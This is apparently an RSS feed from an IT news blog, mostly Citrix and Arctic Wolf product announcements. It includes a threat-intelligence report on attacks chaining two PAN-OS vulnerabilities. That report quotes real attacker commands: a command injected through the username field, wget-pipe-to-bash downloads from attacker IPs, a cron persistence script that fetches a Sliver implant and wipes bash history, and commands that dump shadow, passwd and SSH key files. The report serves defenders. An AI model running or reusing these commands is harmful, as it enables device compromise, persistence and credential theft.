<figure class="wp-block-image size-large"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='576'%20viewBox=%270%200%201024%20576%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#0045db 50% 75%,#0045db 75%),linear-gradient(to right,#fdfdfd 25%,#e79856 25% 50%,#0045db 50% 75%,#0043dc 75%),linear-gradient(to right,#2d2d2d 25%,#ffffff 25% 50%,#0045db 50% 75%,#0045db 75%),linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#0045db 50% 75%,#0045db 75%)" decoding="async" width="1024" height="576" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-1024x576.jpg" alt="Citrix acquires deviceTRUST and Strong Network" class="tf_svg_lazy wp-image-33474" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-1024x576.jpg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-300x169.jpg 300w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-768x432.jpg 768w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix.jpg 1280w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="576" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-1024x576.jpg" alt="Citrix acquires deviceTRUST and Strong Network" class="wp-image-33474" srcset="https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-1024x576.jpg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-300x169.jpg 300w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix-768x432.jpg 768w, https://www.ervik.as/wp-content/uploads/2024/12/devicetrust_stronnetworks_citrix.jpg 1280w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<h2 class="wp-block-heading">Citrix acquires deviceTRUST and Strong Network. Through the acquisitions of deviceTRUST and Strong Network, Citrix customers will gain real-time protection for VDI and DaaS users, secure cloud development environments for developers, and expanded capability to protect access to all applications and data in hybrid environments with Citrix Secure Private Access.</h2>



<p>With the widespread adoption of hybrid work models, where teams operate across geographical regions on managed and unmanaged devices, every connection and endpoint presents a potential security risk. Addressing this challenge,&nbsp;<a href="https://www.citrix.com/content/citrix/en_us/" target="_blank" rel="noopener">Citrix</a>,&nbsp;a business unit of Cloud Software Group Inc., today announced the strategic acquisitions of deviceTRUST GmbH and strong.network SA.</p>



<p>Building on its commitment to strengthen security throughout its solutions, these acquisitions expand the security capabilities of the Citrix<sup>Ⓡ</sup>&nbsp;platform, enabling it to isolate and protect access to mission-critical applications deployed across on-premises and cloud environments while ensuring access for developers to cloud development environments.&nbsp; With these new additions, Citrix is empowering companies to simplify zero-trust access to meet diverse user needs in hybrid application deployments while reducing the risk of data loss.</p>



<p>“As businesses continue to evolve to support hybrid work, the demand for cyber resilience has only intensified,” said Sridhar Mullapudi, executive vice president and general manager, Citrix. “We are proud to welcome the deviceTRUST and Strong Network teams to the Citrix family. By integrating their secure access technologies into the Citrix platform, we’re providing greater value for our customers and helping them meet the diverse needs of their users.”</p>



<p><strong>Elevating zero-trust security</strong></p>



<p>The deviceTRUST<sup>Ⓡ</sup>&nbsp;technology introduces a new layer of control, enabling real-time contextual access for VDI and DaaS environments. This capability allows organizations to monitor and respond to changes in device posture and user location, strengthening data security, managing application access, and reducing endpoint risk. By continuously assessing device attestation, the Citrix platform enables IT leaders to grant or revoke access based on real-time security conditions, offering organizations greater control over their network access.</p>



<p><strong>Securing and accelerating developer workflows</strong></p>



<p>The Strong Network<sup><img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /></sup>&nbsp;platform’s secure cloud development environments help businesses build, launch, and access mission-critical applications more efficiently and cost-effectively. Strong Network protects against data breaches with features like data loss prevention and patented data infiltration detection, which guard against phishing, malware, and credential theft. Designed for BYOD setups, the Strong Network platform’s secure cloud development environments also ensure compliance with security standards such as NIST and ISO, while providing clear visibility and control throughout the application lifecycle.</p>



<p><strong>Expanding secure access to hybrid deployments</strong></p>



<p>In addition to these acquisitions, <a href="http://www.ervik.as/citrix">Citrix</a> is also expanding support for Citrix<sup>Ⓡ</sup> Secure Private Access in hybrid environments, providing customers with the simplicity of cloud management with the resiliency of an on-premises data plane.  With Citrix Secure Private Access, businesses can manage secure access to applications across on-premises and cloud environments, extending zero-trust access controls to web and SaaS applications, virtual desktops, and traditional client/server applications—uniquely bridging security and usability across all application types.</p>



<p>Beyond these acquisitions, Citrix is strengthening our commitment to secure hybrid work by expanding Citrix Secure Private Access (SPA). SPA provides the simplicity of cloud management with the strength of an on-premises data plane, allowing businesses to manage access to applications across on-premises and cloud environments seamlessly. Citrix Secure Private Access extends zero trust security to all applications, including web, SaaS, virtual desktops, and traditional client/server applications, ensuring both robust security and a smooth end-user experience.<br>With the addition of deviceTRUST and Strong Network, Citrix has underscored its dedication to providing comprehensive security solutions that enable organizations to embrace hybrid work while safeguarding critical assets. By continuously evolving the Citrix platform to meet the demands for flexibility, security, and collaboration in the modern workforce, Citrix remains a leader in secure digital workspace solutions.</p>



<p>To help with any of your questions we’ve pulled together&nbsp;<a href="https://www.citrix.com/content/dam/citrix/en_us/documents/faq/customer-faqs-devicetrust-strong-network.pdf" target="_blank" rel="noreferrer noopener">a list of FAQs</a>. You can also visit our&nbsp;<a href="https://www.citrix.com/platform/citrix-secure-private-access/" target="_blank" rel="noreferrer noopener">Citrix security page</a>&nbsp;where we will continue to share more.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How to Advance your Security Journey with Arctic Wolf</title>
		<link>https://www.ervik.as/how-to-advance-your-security-journey-with-arctic-wolf/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 11 Dec 2024 13:52:35 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[Security Journey]]></category>
		<category><![CDATA[soc]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33440</guid>

					<description><![CDATA[In this demo, we will see how Arctic Wolf&#8217;s unified portal reflects the status of Security Focuses and the availability of Security Reviews to help customers monitor and plan the advancement of their security journey.]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-to-advance-your-security-journey-with-arctic-wolf%2F&amp;linkname=How%20to%20Advance%20your%20Security%20Journey%20with%20Arctic%20Wolf" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<p>In this demo, we will see how Arctic Wolf&#8217;s unified portal reflects the status of Security Focuses and the availability of Security Reviews to help customers monitor and plan the advancement of their security journey.<br><br><a href="https://www.youtube.com/@ArcticWolfNetworks" target="_blank" rel="noopener"></a></p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<div class="post-video"><iframe loading="lazy" title="How to Advance your Security Journey with Arctic Wolf" width="1165" height="655" src="https://www.youtube.com/embed/nr8BCdV0XO8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
</div></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How Arctic Wolf Delivers Comprehensive Response Capabilities</title>
		<link>https://www.ervik.as/how-arctic-wolf-delivers-comprehensive-response-capabilities/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 11 Dec 2024 13:49:18 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[soc]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33436</guid>

					<description><![CDATA[The Arctic Wolf analyst team is known for their 24&#215;7 monitoring and concierge level service. In this video we&#8217;ll explore a few of the response actions the SOC team has at their disposal to take action and mitigate impact during a cyber security incident.]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fhow-arctic-wolf-delivers-comprehensive-response-capabilities%2F&amp;linkname=How%20Arctic%20Wolf%20Delivers%20Comprehensive%20Response%20Capabilities" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='576'%20height='225'%20viewBox=%270%200%20576%20225%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="576" height="225" data-tf-src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="How Arctic Wolf Delivers Comprehensive Response Capabilities" class="tf_svg_lazy wp-image-25623" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" data-tf-sizes="(max-width: 576px) 100vw, 576px" /><noscript><img decoding="async" width="576" height="225" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="How Arctic Wolf Delivers Comprehensive Response Capabilities" class="wp-image-25623" srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" sizes="(max-width: 576px) 100vw, 576px" /></noscript></figure>



<p>The Arctic Wolf analyst team is known for their 24&#215;7 monitoring and concierge level service. In this video we&#8217;ll explore a few of the response actions the SOC team has at their disposal to take action and mitigate impact during a cyber security incident.<br><br></p>



<p><a href="https://www.youtube.com/@ArcticWolfNetworks" target="_blank" rel="noopener"></a></p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<div class="post-video"><iframe loading="lazy" title="How Arctic Wolf Delivers Comprehensive Response Capabilities" width="1165" height="655" src="https://www.youtube.com/embed/6fljJ6xKU54?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
</div></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices</title>
		<link>https://www.ervik.as/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 28 Nov 2024 20:28:16 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[Arctic Wolf Labs]]></category>
		<category><![CDATA[cobalt strike]]></category>
		<category><![CDATA[CVE]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Firewall]]></category>
		<category><![CDATA[PAN-OS]]></category>
		<category><![CDATA[RCE vulnerability]]></category>
		<category><![CDATA[Sliver C2]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33023</guid>

					<description><![CDATA[Arctic Wolf Observes Ongoing Exploitation of Critical Palo Alto Networks Vulnerability CVE-2024-0012 Chained with CVE-2024-9474 On November 19, 2024, Arctic Wolf began observing active exploitation of the recently-disclosed CVE-2024-0012 and CVE-2024-9474 vulnerabilities impacting Palo Alto Networks PAN-OS software. When chained together, these vulnerabilities allow an unauthenticated threat actor with network access to the management web interface to gain administrator [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices%2F&amp;linkname=Arctic%20Wolf%20Observes%20Threat%20Campaign%20Targeting%20Palo%20Alto%20Networks%20Firewall%20Devices" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='300'%20height='184'%20viewBox=%270%200%20300%20184%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#233c4c 25%,#233c4c 25% 50%,#003054 50% 75%,#233c4c 75%),linear-gradient(to right,#003054 25%,#003054 25% 50%,#003054 50% 75%,#233c4c 75%),linear-gradient(to right,#233c4c 25%,#013054 25% 50%,#233c4c 50% 75%,#f48120 75%),linear-gradient(to right,#233c4c 25%,#233c4c 25% 50%,#233c4c 50% 75%,#233c4c 75%)" decoding="async" width="300" height="184" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/11/AW_Arctic_Labs_logo.png" alt="Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices" class="tf_svg_lazy wp-image-33024"/><noscript><img decoding="async" width="300" height="184" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/11/AW_Arctic_Labs_logo.png" alt="Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices" class="wp-image-33024"/></noscript></figure>



<h2 class="wp-block-heading">Arctic Wolf Observes Ongoing Exploitation of Critical Palo Alto Networks Vulnerability CVE-2024-0012 Chained with CVE-2024-9474</h2>



<p>On November 19, 2024, <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf </a>began observing active exploitation of the recently-disclosed <a href="https://security.paloaltonetworks.com/CVE-2024-0012" target="_blank" rel="noreferrer noopener">CVE-2024-0012</a> and <a href="https://security.paloaltonetworks.com/CVE-2024-9474" target="_blank" rel="noreferrer noopener">CVE-2024-9474</a> vulnerabilities impacting Palo Alto Networks PAN-OS software. When chained together, these vulnerabilities allow an unauthenticated threat actor with network access to the management web interface to gain administrator privileges. Exploitation could enable threat actors to perform administrative actions, modify configurations, or leverage other authenticated privilege escalation vulnerabilities. Since our last bulletin regarding these vulnerabilities, the following has occurred: </p>



<ul class="wp-block-list">
<li>We have detected exploitation of CVE-2024-9474 chained with CVE-2024-0012 in customer environments. While CVE-2024-9474 is classified as a medium-severity vulnerability on its own, exploiting CVE-2024-0012 allows a threat actor to bypass authentication and gain PAN-OS administrator access to the management web interface, allowing them to escalate privileges and perform actions on the firewall with root privileges. </li>



<li>Upon successful exploitation, we have observed threat actors attempting to transfer tools into the environment and exfiltrate config files from the compromised devices. </li>



<li>On November 19, 2024, new technical details of CVE-2024-0012 and CVE-2024-9474 were publicly <a href="https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/" target="_blank" rel="noreferrer noopener">disclosed by WatchTowr</a>, which included Proof-of-Concept (PoC) exploit code. </li>



<li>PAN has further specified that CVE-2024-0012 only affects PA-Series, VM-Series, and CN-Series firewalls running PAN-OS versions 10.2, 11.0, 11.1, and 11.2, as well as Panorama (virtual and M-Series) and WildFire appliances. </li>



<li>In addition to identical impacted products, CVE-2024-9474 impacts PAN-OS 10.1. </li>
</ul>



<p>Arctic Wolf assesses with high confidence that threat actors will continue targeting this vulnerability due to a PoC exploit being made available publicly, which lowers the barrier to exploitation. Additionally, publicly exposed firewalls are an attractive target due to the risk of exfiltrating sensitive data and conducting further lateral movement in compromised environments. Earlier this year when threat actors exploited&nbsp;<a href="https://arcticwolf.com/resources/blog/cve-2024-3400-follow-up-patches-released-for-actively-exploited-critical-vulnerability-in-globalprotect-feature-of-pan-os/" target="_blank" rel="noreferrer noopener">GlobalProtect</a>, Palo Alto Networks devices were shown to be an attractive target to threat actors.&nbsp;</p>



<p><a href="https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/" target="_blank" rel="noopener">Learn more here</a></p>



<h2 class="wp-block-heading">What We Know About the Intrusions</h2>



<h3 class="wp-block-heading">Exploitation Details</h3>



<p>Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent&nbsp;<a href="https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/" target="_blank" rel="noopener">watchTowr technical writeup</a>, threat actors were quick to begin mass exploitation using the available technical details.</p>



<p>With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the&nbsp;<a href="https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/" target="_blank" rel="noopener">most recent watchTowr article</a>, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:</p>



<pre class="wp-block-preformatted">1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME

</pre>



<p>Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.</p>



<ul class="wp-block-list">
<li>watchTowr.js</li>



<li>watchTowr.php</li>



<li>watchTowr.txt</li>



<li>CVE20249474.php</li>
</ul>



<h3 class="wp-block-heading">Command and Control</h3>



<p>Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.</p>



<p>Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used Cobalt Strike penetration testing tool.</p>



<pre class="wp-block-preformatted">wget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash

</pre>



<p>The contents of the script (vicidial_sign.js) shown below has several key functions:</p>



<ul class="wp-block-list">
<li>Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the /usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.</li>



<li>The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.</li>



<li>Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.</li>



<li>The script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies, /usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod 700), then proceeds to run it in the background.</li>



<li>The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.</li>



<li>The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.</li>



<li>Bash history is cleared to avoid evidence of the commands having been executed.</li>
</ul>



<pre class="wp-block-preformatted">#!/bin/bash
curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas
touch -r  /usr/lib/php.ini /usr/lib/e_nas
echo '' &gt; /etc/cron.hourly/telemetry.cron
echo '#!/bin/sh' &gt; /etc/cron.hourly/telemetry.cron
echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib &amp;&amp;  chmod 700 /usr/bin/cloud-lib &amp;&amp; (/bin/cloud-lib &amp;); fi'" &gt;&gt; /etc/cron.hourly/telemetry.cron
chmod 755 /etc/cron.hourly/telemetry.cron 
touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron
echo "" &gt; /root/.bash_history

</pre>



<p>The file (up.js) outlined in the section above is a UPX-packed Sliver payload.</p>



<h3 class="wp-block-heading">Data Exfiltration</h3>



<p>In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most exfiltration data included firewall configuration files which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate operating system&nbsp;passwd&nbsp;and&nbsp;shadow&nbsp;files.</p>



<p>Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:</p>



<pre class="wp-block-preformatted">cat /root/.ssh/authorized_keys &gt; /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
cat /etc/networks &gt; /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
arp -a &gt; /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/passwd &gt; /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/shadow &gt; /var/appweb/htdocs/unauth/watchTowr.txt’

</pre>



<p>In some instances, threat actors archived the output of these files using the&nbsp;tar&nbsp;command:</p>



<pre class="wp-block-preformatted">tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
    
</pre>



<h3 class="wp-block-heading">PHP Webshell</h3>



<p>One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:</p>



<ol class="wp-block-list">
<li>When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.</li>



<li>Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.</li>



<li>The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting of the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of 18f566d952acaa29.</li>
</ol>



<p><a href="https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/" target="_blank" rel="noopener">Learn more here</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Citrix Announces General Availability of Citrix Daas for Amazon WorkSpaces Core</title>
		<link>https://www.ervik.as/citrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 16:18:36 +0000</pubDate>
				<category><![CDATA[Citrix DaaS]]></category>
		<category><![CDATA[Amazon WorkSpaces Core]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[DaaS]]></category>
		<category><![CDATA[M365]]></category>
		<category><![CDATA[VDI]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=32876</guid>

					<description><![CDATA[Citrix, a business unit of Cloud Software Group, Inc., announced the general availability of Citrix DaaS™ for Amazon WorkSpaces Core from Amazon Web Services (AWS). This innovative solution leverages the strengths of Citrix DaaS with AWS’s managed virtual desktop infrastructure (VDI) service, Amazon WorkSpaces Core, offering businesses a secure, high-performing, and economically effective way to [&#8230;]]]></description>
